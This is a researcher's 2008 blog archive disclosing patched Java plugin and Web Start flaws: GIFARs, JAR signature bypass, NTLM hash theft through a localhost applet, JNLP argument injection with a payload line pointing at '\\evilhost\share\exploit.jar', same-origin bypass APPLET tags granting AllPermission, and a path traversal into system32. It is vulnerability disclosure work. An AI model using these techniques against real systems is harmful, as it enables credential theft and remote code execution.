Saturday 2 August 2008

On GIFARs

The Black Hat Briefings 2008 are fast approaching. As I mentioned in my previous post on stealing password hashes I am speaking with Nate McFeters and Rob Carter; you can find the abstract for our talk here.


One of the areas that we'll be talking about is some quality research carried out by Billy Rios (Billy was originally speaking due to speak with us but is no longer; he is giving his Bad Sushi talk though, so check it out). Billy realised that you can make a JAR archive look like a GIF image (dubbed a "GIFAR"), or in more general terms, that you can make a JAR look like many other file types. He is not alone in this observation; PDP has also been working on similar ideas. Now many websites allow you to upload specific types of content - images for example. Most web applications will check the extension of the uploaded files and many will also do some content inspection to make sure the file is what the extension says it is.


This means we can upload a JAR on to a publicly accessible page (e.g. a profile page). This has interesting implications. Suppose you end up running malicious content in your browser. Ordinarily it would not be able to fully interact with other websites you might be logged into (CSRF does not constitute full interaction); this is a tenet of the same origin policy implemented by all browsers. However what if the malicious content contains an APPLET tag that references the JAR file uploaded to the target site? The Java browser plugin sees a codebase URL of the target site and consequently adds a SocketPermission allowing the applet to connect back to it and make full requests.


But that is only part of the story. It turns out that when an applet makes an HTTP request to a website the Java browser plugin will slap on the relevant cookies from the browser cookie store (even if the applet is unsigned). This initially surprised me - as far as I can remember older versions of the JRE never supported this. A little digging into how this is accomplished in IE revealed there is a class, com.sun.deploy.net.cookie.IExplorerCookieHandler that contains the following native methods:



JNIEXPORT jstring JNICALL Java_com_sun_deploy_net_cookie_IExplorerCookieHandler_getCookieInfo
(JNIEnv *env, jobject sender, jstring url)

JNIEXPORT void JNICALL Java_com_sun_deploy_net_cookie_IExplorerCookieHandler_setCookieInfo
(JNIEnv *env, jobject, jstring url, jstring value)


These methods call the Wininet functions InternetGetCookie and InternetSetCookie respectively. Now if only there was a way of calling these functions with arbitrary URLs... (seriously I don't have one! At least I don't yet.)


So to summarise, once the malicious content references an applet on the target site, it can send arbitrary requests and parse the responses; if you are logged are, these requests will be made with your cookies, giving the applet full control of your account.


Billy's research is getting a fair amount of press (with some creative headlines) prompting Nate to make some further clarifications on his blog. In some of the articles that are appearing credit is wrongly being attributed to me/my employer/Nate/Black Hat hackers/those pesky kids/our new GIFAR overlords and so on, so I'm setting the record straight: this is Billy's baby.


Anyway, that's a brief summary of the issue. Hopefully I'll have time to put out another post before Black Hat. If not, hope to see you there.




Cheers

John

Wednesday 9 July 2008

Time to update your JRE again

[ Edit: Brian Krebs of the Washington Post's Security Fix blog spoke to me about Java security. You can read his column here. ]


Sun have just released JRE Version 6 Update 7... which means 90% of desktops are currently at risk until they are upgraded!*. If you have the Java Update Scheduler enabled you should get prompted to update soon (depending on the update frequency you selected). If you want to be proactive, fire up the Java Control Panel, click on the Update tab then click on the Update Now button or head to http://www.java.com and download the binary directly.


According to Sun's Security Blog the latest update fixes 8 issues. I'll be releasing advisories and blogging on the issues that I had a hand in, namely:


    238666 Native code execution through malformed TrueType font headers in untrusted Java applet.

    238905 Multiple buffer overflows in Java Web Start JNLP handling

    238905 Security problems with the JRE family version support


If you're thinking the first two issues sound all too familiar, you'd be right. I previously discussed this font issue that led to execution of arbitrary code. And the JNLP parsing code has had a number of similar buffer overflows (details here, here and here) ... not so much "same bug, different app" (the theme of this Brett Moore presentation) as "same bug, same app!"


So perhaps the most interesting vulnerability is 238905, the JRE family version support issue. You may have noticed that JRE updates typically install alongside older versions so a given machine is likely to have several versions installed as noted by Brian Krebs. Prior to the introduction of Secure Static Versioning in JRE Version 5 update 6, it was possible for an applet to select the version of the JRE with which to run. Of course, a malicious applet could purposefully select an older vulnerable version in order to exploit known security flaws. Secure Static Versioning fixed this, however during my tests I was able to circumvent it and downgrade the browser's JRE. More on this in a future post.


I'll also be blogging on a couple of other issues Sun have recently fixed. There are no SunSolve entries for these since they turned out to be flaws in the interaction between Java Web Start and Sun's web servers when installing alternate versions of the JRE as specified in JNLP files. They ultimately allowed us to present bogus security dialogs to the user, duping them into installing an older version of the JRE. These issues serve as a reminder of the dangers of including user-supplied input in security-related dialog boxes.


So a few things in the pipeline; I haven't forgotten about part II of Stealing Password Hashes with Java and IE but it's a busy time and Black Hat is almost upon us so be patient :)



Cheers


John


* JavaOne Keynote, 2008 - 90% of desktops run Java SE. This is unsurprisingly slightly higher than Adobe's reckoning.

Saturday 21 June 2008

A Different Form of JAR Hell

In my last post I used a Java applet to steal password hashes. Part two, covering NTLMv2, is on its way. Today however, I'm going to discuss SunSolve #233323 - a vulnerability that was fixed in the March updates to the JRE. Anyone who caught my ToorCon talk will have already heard me discuss this issue.


Java Web Start has provision for resources, signed JAR files that contain either Java classes or native libraries that can be cached for use by one or more applications. JARs containing Java classes are extracted as per the usual Java caching mechanism (i.e. written to disk using randomly generated names) whereas native libraries are extracted with their original filenames. Interestingly filenames can include parent path sequences (e.g. ..\..\..\..\test.txt). This means that "nativelibs" can be written outside the cache folder. But that's ok because nativelib resources need to be signed and therefore explicitly trusted by the user, right?


Not exactly. Take a look at the following code snippet, which resembles the vulnerable Java Web Start code, and see if you can spot the bypass (it's not exactly obvious):


try
{
// Open the JAR file specifying true to indicate
// we want to verify the JarFile is signed.
JarFile jf = new JarFile(UserSuppliedFile, true);

Enumeration e = jf.entries();
while (e.hasMoreElements())
{
ZipEntry ze = (ZipEntry) e.nextElement();
InputStream i = jf.getInputStream(ze);
byte b[] = new byte[i.available()];
i.read(b);

// Call our method to write the bytes
// to disk

WriteFileToDisk(ze.getName(), b);
}
}
catch (SecurityException se)
{
// Some sort of signature verification error
System.out.println("Security Error: " + se.toString());
}
catch (IOException ioe)
{
System.out.println("File Error: " + ioe.toString());
}


If you spotted the problem, well done! If not, here's a hint courtesy of an IBM article on signed JARs:


Each signer of a JAR is represented by a signature file with the extension .SF within the META-INF directory of the JAR file. The format of the file is similar to the manifest file -- a set of RFC-822 headers. As shown below, it consists of a main section, which includes information supplied by the signer but not specific to any particular JAR file entry, followed by a list of individual entries which also must be present in the manifest file. To validate a file from a signed JAR, a digest value in the signature file is compared against a digest calculated against the corresponding entry in the JAR file.


What if a file doesn't have a corresponding manifest entry? It turns out the above code will happily call WriteFileToDisk anyway and there'll be no exception thrown. We can use this bypass to append a file to a signed resource and have it drop a java.policy file in the user's home directory allowing applets and Web Start applications to do bad things.

Let's take a look at how the Jarsigner tool that ships with the JDK validates signed JARs. Jarsigner correctly detects JARs containing both signed and unsigned content:



The code snippet below shows the enumeration of ZipEntrys; it's taken from sun.security.tools.JarSigner:


Enumeration e = entriesVec.elements();

long now = System.currentTimeMillis();

while (e.hasMoreElements()) {
JarEntry je = (JarEntry) e.nextElement();
String name = je.getName();
CodeSigner[] signers = je.getCodeSigners();
boolean isSigned = (signers != null);
anySigned |= isSigned;
hasUnsignedEntry |= !je.isDirectory() && !isSigned
&& !signatureRelated(name);


The code retrieves the entry's CodeSigners; if there are none the entry is deemed unsigned.


As an aside, it's actually possible to fool Jarsigner. Take a look at the signatureRelated method, which is called above:


    /**
* signature-related files include:
* . META-INF/MANIFEST.MF
* . META-INF/SIG-*
* . META-INF/*.SF
* . META-INF/*.DSA
* . META-INF/*.RSA
*/
private boolean signatureRelated(String name) {
String ucName = name.toUpperCase();

if (ucName.equals(JarFile.MANIFEST_NAME) ||
ucName.equals(META_INF) ||
(ucName.startsWith(SIG_PREFIX) &&
ucName.indexOf("/") == ucName.lastIndexOf("/"))) {
return true;
}


Jarsigner ignores unsigned files that start with the prefix "META-INF/SIG-":



Anyway, back to the Web Start issue. Soon after discovering this bug I realised it was effectively moot for I hadn't seen any security dialogs even when working with fully signed JARs. It turned out there were none. Ever. You could simply even use a self-signed JAR! Still, it's a great example of a managed language providing a simple interface (JarFile) that masks a complex implementation; if the contract between the caller and the callee is not clearly defined (however simple the interface), developers can write insecure code without knowing it.


So that's it for now. There's also some interesting behaviour when loading applets containing signed and unsigned content but I'll save that for another day.



Cheers

John

p.s. In case you were wondering, JAR hell is Java's form of DLL hell.

Thursday 5 June 2008

Stealing Password Hashes with Java and IE





Consider for a moment the state of client-side bugs 5 or 6 years ago. Attacks such as this, a multi-stage miscellany of IE and Mediaplayer bugs that resulted in the "silent delivery and installation of an executable on the target
computer, no client input other than viewing a web page" were reported with regularity. Gradually these type of attack gave way to exploitation of direct browser implementation flaws such as the IFRAME overflow and DHTML memory corruption flaws. So what has become of the multi-stage attacks - have they become redundant? The answer to this, which I'm sure you can guess, is a resounding "no" and will be emphatically demonstrated in my upcoming Black Hat talk "The Internet is Broken: Beyond Document.Cookie - Extreme Client Side Exploitation", a joint double session presentation co-presented by Billy Rios, Nate McFeters and Rob Carter.


As a teaser for that, I'm going to revisit an old attack - pre-computed dictionary attacks on NTLM - and discuss how we can steal domain credentials from the Internet with a bit of help from Java. I'm going to split it into two posts. In this post we'll apply the attack to Windows XP (a fully patched SP3 with IE7). In my next post we'll consider its impact on Windows Vista.


NTLM Fun and Games

The weaknesses of NTLM have long been understood (and documented and presented) so I'm not going to cover them in detail here. For the interested reader I recommend this L0phtCrack Technical Rant and Jesse Burn's presentation from SyScan 2004, NTLM Authentication Unsafe. The pre-computed dictionary attack on NTLM that we are interested in has also already been implemented in tools such as PokeHashBall. In a nutshell, this attack works as follows:


  1. Position yourself on the Intranet.

  2. Coerce a client, either actively or passively, into connecting to a service (such as SMB or a web server) on your machine.

  3. Request authentication and supply a pre-selected challenge.

  4. Capture the hashes from the NTLM type 3 message and crack them using rainbow tables or brute force.

A requirement of this attack is for the attacker to be located on the Intranet. There have been suggestions on how to remove this necessity; see this post for a discussion on DNS rebinding as a potential solution. Let's take a step back though and begin by reviewing IE's criteria for determining whether a site is located on the Intranet or the Internet:



By default, the Local Intranet zone contains all network connections that were established by using a Universal Naming Convention (UNC) path, and Web sites that bypass the proxy server or have names that do not include periods (for example, http://local), as long as they are not assigned to either the Restricted Sites or Trusted Sites zone


Let's focus on names that do not include periods. As Rob Carter has pointed out, there are more than a few home/corporate products that install web servers bound to localhost and since http://localhost meets the above criteria, XSS in these products let's us control content in the Local Intranet Zone. If we were therefore able to fully control a web server on the local machine, headers and all, and we were able to cause IE to connect to it, we could ask IE to authenticate allowing us to use a pre-selected challenge in order to carry out a pre-computed dictionary attack. But how does a malicious website run a web server on your machine? This is where the Java browser plugin comes into play...


A Web Server in Java

There is nothing to stop an unsigned Java applet from binding a port provided the port number is greater than 1024. The same origin policy, which I've discussed previously is enforced when the applets accepts() a connection from a client; only the host from which the applet was loaded is allowed to connect to the port. If a different host connects, a security exception is thrown, as shown below.



This means that if we can make the applet think it was loaded from localhost, we can bind a port and act as a web server, serving requests originating from localhost. I have previously covered two ways of manipulating the applet codebase (the verbatim protocol handler and defeating the same origin policy), but these flaws are now patched. We can accomplish the same effect on the most recent Java browser plugin by forcing content to be cached in a known location on the file system and by referencing it using the file:// protocol handler*. So if we know that our class was stored at c:\test.class for example, we could load it via the following APPLET tag (the default directory is the desktop hence the ..\..\..\):


<APPLET code="test" codebase="file:..\..\..\"></APPLET>


The result of loading content from the local machine is that a SocketPermission is added allowing the applet to bind a port and accept connections from localhost.


So this attack effectively boils down to caching content in a known location. The Java applet caching mechanism stores content at %UserProfile%\Application Data\Sun\Java\Deployment\cache (or equivalent under Protected Mode on Vista). Class files and JARs are given randomly generated names (and that's SecureRandom before you ask). There are, however, multiple ways of silently getting content onto the local machine with a fixed name. And thats all I'm going to say for now; we'll be addressing this topic further in our Black Hat talk :)


The Windows Firewall

What about the Windows firewall you may ask. The trick is to make sure we bind to 127.0.0.1 only as doing so will not trigger a security dialog. This is accomplished in Java as follows:


ServerSocket ss = new ServerSocket(port, 0, InetAddress.getByName("127.0.0.1"));


Actually it turns out that on Vista in order for our web server applet to work at all, we must call the ServerSocket(int port, int backlog, InetAddress bindAddr) constructor anyway rather than simply ServerSocket(int port). Calling ServerSocket(int port) will bind using IPv6 as well as IPv4; when we then point IE to http://localhost, it will connect to the IPv6 endpoint and throw the following exception:



The reason for this is that the Java code adds a SocketPermission for 127.0.0.1 which is obviously IPv4 only.


Putting it all together

The code for the web server applet is very simple. We needn't implement a full, multi-threaded web server; all we really need to do is send an HTTP/1.1 401 return code with a WWW-Authenticate header of NTLM in response to IE's first request. This will trigger the NTLM exchange of base-64 encoded messages. Since NTLM authenticates connections we must remember to send a Content-Length header (even if there's no content, i.e. Content-Length: 0) to ensure the connection stays open. There are several resources out there that provide detailed NTLM specs and examples. I used this one.


The HTML page that we use to tie the attack together consists of multiple hidden IFRAMEs: firstly to load the Java browser plugin and cache the content, then to launch the web server applet from file://, then to make a request to http://localhost. For my PoC I created a 2nd applet to display the progress of the attack and to allow me to easily copy and paste the hashes out of the browser; a sample capture is shown below. Obviously in a real attack we'd want to ship the hashes off the victim's box either via JavaScript or Java.



Once we have the hashes, we can use rainbow tables to crack the first 7 characters of the LM response or brute force via a password cracker that can handle captured NTLM exchanges, such as John the Ripper with this patch. We can then brute force the remainder of the password. For anyone interested in the approaches to cracking NTLM, I recommend warlord's Uninformed paper, Attacking NTLM with Precomputed Hashtables.



Summary

So to summarise the above, if a user on a domain joined XP machine with the Java browser plugin visits a malicious website with IE, the malicious website can steal their username, domain name and a challenge response pair in order to carry out a pre-computed dictionary attack, likely revealing the user's password in a short time.


Once again this is not a new attack - there are a good many tools that implement the well known NTLM attacks such as SMBRelay, ScoopLM and Cain & Abel. The delivery and execution of this attack, however, demonstrates that multi-stage client-side attacks are alive and well...


That's it for now. Next time we'll consider how this attack applies to Vista, which enforces the more secure NTLMv2 by default.




Cheers

John


*Note that unlike Flash, Java implements its own protocol handlers rather than relying on the browser's.

Thursday 17 April 2008

And For My Next Trick...

One of the examples given in the "Attacking Application Logic" chapter of The Web Application Hacker's Handbook is entitled "Escaping from Escaping". The prelude to the attack is that the developer has to pass user-supplied input as a parameter to an OS command. Realising that meta-characters in the user data are dangerous, the dev sets out to escape them. The flaw is quite simply that the dev forgets to escape the escape character, thus the attacker can escape it in order to pass dangerous characters.


Today I'll show a real world example of this attack, a bug I reported to Sun that was recently patched in Sun Alert 233323. Firstly though, some background. Sun released Java Web Start in 2001 as means of one-click deployment of Java applications from the browser (the Java equivalent of .NET's ClickOnce technology). As Web Start applications run outside the browser, they can easily be made available to run offline. The security model enforced on applets still applies to Web Start - unsigned applications cannot interact with the filesystem and access to remote content is subject to the same origin policy.


The architecture of Web Start is interesting. Applications are installed and launched via XML-based JNLP configuration files. JNLP files open with javaws.exe, a native application, whose purpose is to parse the JNLP file and launch javaw.exe (i.e. invoke the JVM) with the correct class.


The JNLP parser has suffered a slew of buffer overflows which I may talk about in a future post. Its also had an argument injection vulnerability, found by Jouko Pynnonen. This could be triggered via the property tag of the JNLP file, which allows certain JVM properties to be set. These properties are passed on the command line to the javaw.exe process. Jouko gave the following example:


<property name="sun.java2d.noddraw" value="true HELLO" />


The property "sun.java2d.noddraw" is considered secure by Web Start (there's a list of the permitted properties in the spec); ultimately the startup command for the application became something like:


javaw.exe -Dsun.java2d.noddraw=true HELLO (other args) your.application


This issue was fixed way back in September 2004 by quoting the input and escaping the double quote character. But guess what wasn't escaped? By inserting an addition "/" into the argument, we can gobble up the escape character allowing us to insert an additional double quote, and thereby pass arbitrary arguments as before.


This vulnerability can be exploited in several ways. Perhaps the easiest is to create an SMB share with null credentials containing the payload Jar file, then reference it as follows in the JNLP:


<property name='http.agent' value='\" -jar \\evilhost\share\exploit.jar \"'/>


The resulting command line effectively boils down to: java -jar \\evilhost\share\exploit.jar with the rest of the line passed as arguments (which our payload can just ignore):


Arg 0: \
Arg 1: -Djnlpx.splashport=4741
Arg 2: -Djnlpx.jvm="C:\Program Files\Java\jre1.6.0_02\bin\javaw.exe"
Arg 3: com.sun.javaws.Main
Arg 4: C:\DOCUME~1\John\LOCALS~1\Temp\javaws114


Of course, this technique may not work if outbound SMB is blocked by a personal or corporate firewall (which is pretty likely these days). I will leave the other techniques for exploiting this as an exercise for the reader :) [Hint: explore ways of caching various type of content via the Java browser plugin]


So what lessons should we take from this affair?


For security researchers:


  • It's worth revisiting patches with the mentality that new code = new bugs. I am as guilty as anyone of not doing this - you send a bug off to a vendor, a while later they fix it and ship a patch, by then you're working on something completely different. History has shown us time and time again it can take more than one attempt to fix a bug (and that other bugs in nearby code may be missed if the code is not scrubbed).


For software vendors:


  • When a vulnerability report comes in, understand fully how the attacks work and review your fixes with a critical eye. Fixing code is an iterative process and should be done from both perspectives: defender and attacker (asking yourself at every step of the way, what new avenues of attacks have we just opened up?) For an example of a bug that dragged on way longer than it should have (due to flaws in the fixes) check out the section on the ExtProc saga in The Database Hacker's Handbook.


Anyway, this is just one of many Java flaws I will be discussing during my ToorCon talk this weekend. If you're not going to be there and you'd like a copy of my slides, drop me a note.


Cheers


John

Tuesday 8 April 2008

Third Party Kill Bits

[Update: I was wrong... It seems Microsoft has previously released kill bits for for third party software. Thanks to Edi and David for notifying me of this; I've updated this post accordingly.]


Just a quick post today. Its the second Tuesday of the month which means its Patch Tuesday. Browsing over the bulletins, there are some interesting ones as always, but MS08-023 caught my eye in particular:


This update includes kill bits that will prevent the following ActiveX controls from being run in Internet Explorer:


Yahoo! has released a security bulletin and an update that addresses the vulnerability in Yahoo! Music Jukebox. Please see the security bulletin from Yahoo! for more information and download locations. This kill bit is being set at the request of the owner of the ActiveX control. The class identifiers (CLSIDs) for this ActiveX control are:


• {5f810afc-bb5f-4416-be63-e01dd117bd6c}


• {22fd7c0a-850c-4a53-9821-0b0915c96139}


Firstly, a recap. A kill bit is a registry setting that prevents an ActiveX control from being instantiated in Internet Explorer. Microsoft have used kill bits extensively over the last few years to mitigate security issues in their own controls; these have been pushed out via Windows Update. Other software vendors have also used kill bits but have had no unified means of pushing out updates. This has lead to a plethora of systray applications running constantly, checking for security updates. As annoying as these can be, the alternative, that the end user must periodically go and check for new updates is not a secure, scalable solution.


To my knowledge, Microsoft hasn't previously provided kill bits over Windows Update for third party controls that do not come bundled with the OS [not true, read this footnote]. This one is for Yahoo! Music Jukebox, and the Microsoft bulletin even links to the Yahoo! Bulletin.


Personally I think its a great idea for third parties to be able to have their kill bits pushed out over Windows Update. That said, I'd be interested in hearing some of the logistics of how this update came about - I'm hoping the Microsoft Security Response team will talk about this in the future. Some of the things I'm wondering are:


  • What is the process for a third party to request that Microsoft kill bit a control?

  • Can any company request their controls be kill bit-ted?

  • If not, what are the criteria?

  • How does Microsoft verify the company is who it says it is, and has permission to kill bit the control?

Anyway, thats it for now. I'll be continuing my analysis of last month's JRE vulnerabilities in a new post later this week.



Cheers

John


Important footnote: It turns out Microsoft has released third party kill bits as hotfixes on at least two previous occasions. MS06-067 provided kill bits for WinZip 10, fixing the CreateNewFolderFromName() issue and
MS07-027 did the same for Acer and RIM vulnerabilities. I suspect there are others in previous bulletins too. I would still be interested to hear how these companies went about coordinating the update with Microsoft though.

Thursday 27 March 2008

Wake up and Smell the Coffee @ ToorCon

On April 19th I'm presenting at ToorCon in Seattle. My talk ("Wake up and smell the coffee: design flaws in the Java browser plugin") will be focused on some of the more interesting Java bugs I've found over the last few months, and how these can be exploited cross-browser, cross-platform and cross-architecture (making Java one of the scariest browser plugins there is, in my opinion). I haven't presented at ToorCon before (nor attended one for that matter) so I'm looking forward to it.


Of the talks already scheduled, several have caught my eye, including Richard Johnson's "Fast n Furious Transforms". Fourier Transforms and I were never the best of friends during my undergrad engineering degree but I always have time for cross-discipline approaches in security and Rich has given some great talks in the past (slides for which can be found here) so I will definitely be checking this one out.


I also noted that Adam Shostack is giving a talk entitled "SDL Threat Modeling: Past, Present and Future". Never was a truer word written than in the first line of his abstract: "Everyone thinks threat modeling is great, and then they encounter a formalized threat modeling process." I am looking forward to hearing his thoughts on the evolution of the SDL.


And finally, I'll get to see Nate McFeters discuss "URI Use and Abuse". Protocol handlers have provided a rich seam of vulnerabilities over the last few years and I hear Nate will be showing that things are likely to stay this way for a good while yet.


Anyway, if you're planning to go to ToorCon, drop me a line.




Cheers


John

Tuesday 18 March 2008

Defeating the Same Origin Policy: Part II

In my last post I gave details of how unsigned applets could bypass the same origin policy in order to make arbitrary network connections; the Sun alert for this issue is here. In this post I'll wrap up my discussion of this bug, showing how it can be used to compromise the host.


Bypassing the Java same origin policy is dangerous in itself - not only could a malicious applet port scan the internal network of the host that instantiates it - it could also interact with and exploit the services it finds. However, in most cases, bypassing the same origin policy (at least in the browser) does not obviously lead to a direct compromise of the host. This particular flaw is different.


Extensions in Java are groups of packages and classes that augment the runtime classes. Extensions are installed into a specified directory and consequently can be located via the JRE without having to explicitly name them on the class path. QuickTime for Java is an example of a Java extension; once installed it enables Java applications to play QuickTime media (and yes, its had its share of security issues).


Moving on... take a look in your java.policy file (located in java.home\lib\security\java.policy) and you'll see where this attack is going. The first entry is most likely:


// Standard extensions get all permissions by default 

grant codeBase "file:${{java.ext.dirs}}/*" {
permission java.security.AllPermission; };


You'll remember from last time that by putting a URL in the code attribute allows an arbitrary codebase to specified. Thus if you use a codebase that references the extensions directory (e.g. "C:\Program Files\java\jre1.6.0_03\lib\ext") the applet is granted java.security.AllPermission. The Java documentation doesn't beat around the bush:


Granting AllPermission should be done with extreme care, as it implies all other permissions. Thus, it grants code the ability to run with security disabled. Extreme caution should be taken before granting such a permission to code. This permission should be used only during testing, or in extremely rare cases where an application or applet is completely trusted and adding the necessary permissions to the policy is prohibitively cumbersome.


The only thing left to do is come up with a reliable means of obtaining the path to the "JREx.y._zw\lib\ext" folder. The JRE version can be determined via querying the java.version property from a "bootstrapper" applet. Its probably safe to assume that on Windows platforms the JRE folder resides within the "Program Files\java" folder. As for the drive letter, the browser plugin prevents reading any properties that contain a path (so this rules out using java.home, java.class.path, user.name, user.home and user.dir). You could of course take a guess; "c:" is a pretty good candidate. There is one Windows-specific property, however, that can be read from an unsigned applet and that discloses a full path. The Windows Desktop Properties expose a win.xpstyle.dllName property that can be read as follows:


String dllName = (String)Toolkit.getDefaultToolkit().getDesktopProperty("win.xpstyle.dllName");


On my test box this returns "E:\WINDOWS\Resources\themes\Luna\Luna.msstyles".


So to conclude, the applet tag (which could obviously be generated dynamically) ends up looking like:


<APPLET code="http://2130706433/foo" codebase="file:E:\Program Files\java\jre1.6.0_03\lib\ext"/>


As for a payload, an applet with AllPermission can call Runtime.getRuntime().exec or System.loadLibrary to go straight to native code, fully compromising the browser.



Cheers

John

Wednesday 12 March 2008

Defeating the Same Origin Policy: Part I

So last week Sun released updated versions of the Java Runtime Environment and with them, a host of Sun Alerts. These are neatly summarised on the Sun Security blog. Over the next few posts I am going to discuss the issues that I had a hand in reporting.


The first one I'm going to tackle is Sun Alert 233324, "A Security Vulnerability in the Java Plug-in May Allow an Untrusted Applet to Elevate Privileges"; NGS advisory is here. Your first thought might be that we achieve the elevation of privilege through a buffer overflow - I blogged on buffer overflows in the JRE a while back and if you read over the alerts Sun published last week, you'll see Java Web Start had several overflows fixed (I'll be discussing Sun Alert 233323, "Multiple Security Vulnerabilities in Java Web Start May Allow an Untrusted Application to Elevate Privileges" at a later date). However, if you read the brief description of this bug you'll see its a little more intriguing:


A security vulnerability in the Java Plug-in may allow an applet that is downloaded from a website to bypass the same origin policy and leverage this flaw to execute local applications that are accessible to the user running the untrusted applet.


I'm going to split the analysis of this issue into two parts. In this post I'm going to cover "bypassing the same origin policy"; in the next post I'm going to cover "leveraging this flaw to execute local applications". If anyone figures out the second part before I post it, add a comment or send me an email :)


So, part one, bypassing the same origin policy. The same origin policy effectively underpins browser security. It means that resources loaded from one origin cannot get or set properties of a resource from a different origin. The web app sec guys are always going on about this and coming up with new ways of bypassing the restriction. I find this research interesting but give me a browser 0day anyday (so its kinda ironic that I'm posting on it!). In the same way that client-side scripting languages enforce the same origin policy, Java implements a sandbox to limit network connectivity in untrusted applets. This is documented in the Java Security FAQ.


In a nutshell, unsigned applets are not allowed to open network connections to any host, except for the host that provided the .class files (either the host where the HTML page came from, or the host specified in the codebase parameter in the applet tag, with codebase taking precendence). Quite simply, if we try to create a connection to foo.com from an applet that did not originate from the machine foo.com, it will fail with a security exception.*


Applets are instantiated via the <APPLET> or <OBJECT> HTML tag. Both the code and codebase attributes/parameters must be set e.g. <APPLET code="foo" codebase="http://bar"/> will cause foo.class to be loaded from http://bar. The code that loads the class creates a URL object via the following constructor:


public URL(URL context,
String spec)
throws MalformedURLException


This constructor has an interesting property, namely:


If the authority component is present in the spec then the spec is treated as absolute and the spec authority and path will replace the context authority and path. If the authority component is absent in the spec then the authority of the new URL will be inherited from the context.


This effectively means that executing:


URL url1 = new URL("http://baz");
URL url2 = new URL(url1, "http://bar");


returns us url2 representing http://bar. So what happens if we instantiate an applet as follows:


<APPLET code="http://baz/foo" codebase="http://bar" />


Though the answer is probably obvious by now, we can use JSwat, the GUI Java debugger frontend, to confirm things.


Briefly, the steps are:


  • Configure JSwat for applet debugging (its easiest to specify "suspend=y" so the debugger doesn't run away).

  • Set a breakpoint on the URL constructor and hit go. The breakpoint will fire quite a few times (we could set a conditional breakpoint to avoid this); we can view the parameters to the constructor via the Variables pane.

  • Eventually we should see the java.net.URL parameter holding the specified applet codebase (http://bar) and the java.lang.String parameter holding the specified code attribute (http://baz/foo). The screenshot below illustrates this for my internal PoC; the codebase was http://www.google.com and the code parameter was http://2130706433/connect (the reason for using 2130706433 will be explained shortly).


JSwat... it swats bugs.


So now we can definitively answer the question: it will load foo from baz but report the codebase as bar. We've defeated the same origin policy; our applet can connect to bar even though it was loaded from baz.


Of course, the devil is in the detail... there are some complications to get this attack working. Firstly, if we specify a code parameter containing a '.', e.g.:


<APPLET code="http://baz.com/foo" codebase="http://bar" />


then an internal canonicalisation routine is triggered, converting '/' characters into '.' so we end up with a URL looking like "http:..baz.com.foo" and the attack fails. The easiest way round this limitation is to use the decimal representation of an IP address, as is apparently common with spammers. If you're too lazy to do the maths, there's an online converter here. So our code parameter will look like:


<APPLET code="http://2130706433/foo" codebase="http://bar" />


The final complication is that the Java plugin loads foo.class expecting to find a class called "http://2130706433/foo". This is easy to solve - we compile our class with a class name of "aaaaaaaaaaaaaaaaaaaaa" and use a hex editor to replace this string with "http://2130706433/foo" (the compiler doesn't like it but the JVM will load it).


That concludes the first post on this issue. Next time I'll cover using the same origin bypass to escape the sandbox.




Cheers

John




* A while back I posted an advisory on another same origin bypass that allowed an applet loaded from a remote location to connect to localhost, thereby allowing it to attack local services.

Thursday 28 February 2008

Repurposing Attacks Against Java Applets

If you read my review of the Web Application Hacker's Handbook you may remember I made the following point:


The authors talk about repurposing ActiveX controls but do not mention that this also applies to signed Java applets, which can also expose dangerous methods in exactly the same way.


In this post I'm going to discuss a security flaw in a Java applet signed by Sun Microsystems. The vulnerability lets us drop an arbitrary file to an arbitrary location on the file system on Windows platforms, subject to the user's permissions and, if in IE7, depending on whether Protected Mode is on or not. The applet in question has been updated to fix this issue and the NGS advisory is here.


Before I talk about the applet itself, lets take a brief look at the components of a signed JAR:


  • A signed Java applet consists of a JAR file (a zip archive) containing the application class files, a manifest, one or more signature files and a signature block.

  • The manifest holds a list of files in the JAR that have been signed and a corresponding digest for each file, typically SHA1.

  • A signature file consists of a main section which includes information supplied by the signer but not specific to any particular jar file entry, followed by a list of individual entries whose name must also be present in the manifest file. Each individual entry must contain at least the digest of the corresponding entry in the manifest file.

  • The signature block contains the binary signature of the signature file and all public certificates needed for verification.

For anyone interested in the verification process, this paragraph from the Java Plug-in Developer's Guide gives a good description. In practice, the user is presented a dialog like this:



Contrast this to the dialog box that IE7 presents when installing a new ActiveX control (and note that I clicked for "more options" to show the always install/never install options):



The difference from a security perspective, is obvious*: Sun want you to always trust the publisher, Microsoft want to ask you every time. For anyone wondering if you only see this behaviour with Sun-signed applets, this is the default behaviour for all signed applets (don't believe me? Go check out the Hushmail applet). It is worth noting, however, that the checkbox is only ticked if the certificate chain verifies all the way up to a trusted Root CA certificate. If the certificate has expired, or is self-signed the checkbox will not be ticked.


This is a pretty interesting design decision. If you click "Run" in the Java dialog box above, you're allowing all existing and future applets signed by the same publisher (strictly the same certificate) to automatically run regardless of the website they are loaded from and the parameters they are instantiated with. So even if you have some level of confidence in the applet that you are about to run, if the publisher produced a buggy applet and signed it with the same certificate, a malicious website can repurpose it and silently use it against you. Scary, huh? This is one of those useability vs. security trade-offs**. Even if the applet is cached on your machine, if the certificate is not in the trusted store, you will be prompted every time its instantiated. If you're the IT manager of a large corporation and your Intranet homepage has a signed applet, you probably don't want your users to see a security warning everytime they open a browser.


Now for the actual vulnerability... The JNLPAppletLauncher is a "general purpose JNLP-based applet launcher class for deploying applets that use extension libraries containing native code." What this means is an unsigned applet that requires a signed native code extension such as Java 3D can be launched via invoking the JNLPAppletLauncher and passing it a JNLP file that references both the original applet and the extension. There are some demos here; FourByFour is a great example of Java 3D in the browser (though tic-tac-toe on a 4x4x4 cube... its not exactly Guitar Hero III).


The JNLPAppletLauncher had a simple directory traversal flaw exploitable on Windows platforms. The applet reads extensions from the JNLP file, whose location is passed as a parameter during the applet instantiation. The extension path is examined for the parent path sequence "../". On Windows of course, this is insufficient - the failure to check for "..\" ultimately allows us to drop an arbitrary file on the file system. The extension path is concatenated to the base URL so we end up with something like:


http://attackerdomain/..\..\..\..\..\..\windows\system32\file.dll


If you're thinking this is an invalid URL, you're right. You'll need a hacked up web server to honour it, or at least the ability to modify the httpd.conf on an Apache server. A request for a file below the web root will cause Apache to generate an HTTP 400 (Bad Request). We can translate this into an HTTP 302 (Redirect) via the ErrorDocument directive. The applet will follow the redirection and download the content to the path "..\..\..\..\..\..\windows\system32\file.dll".


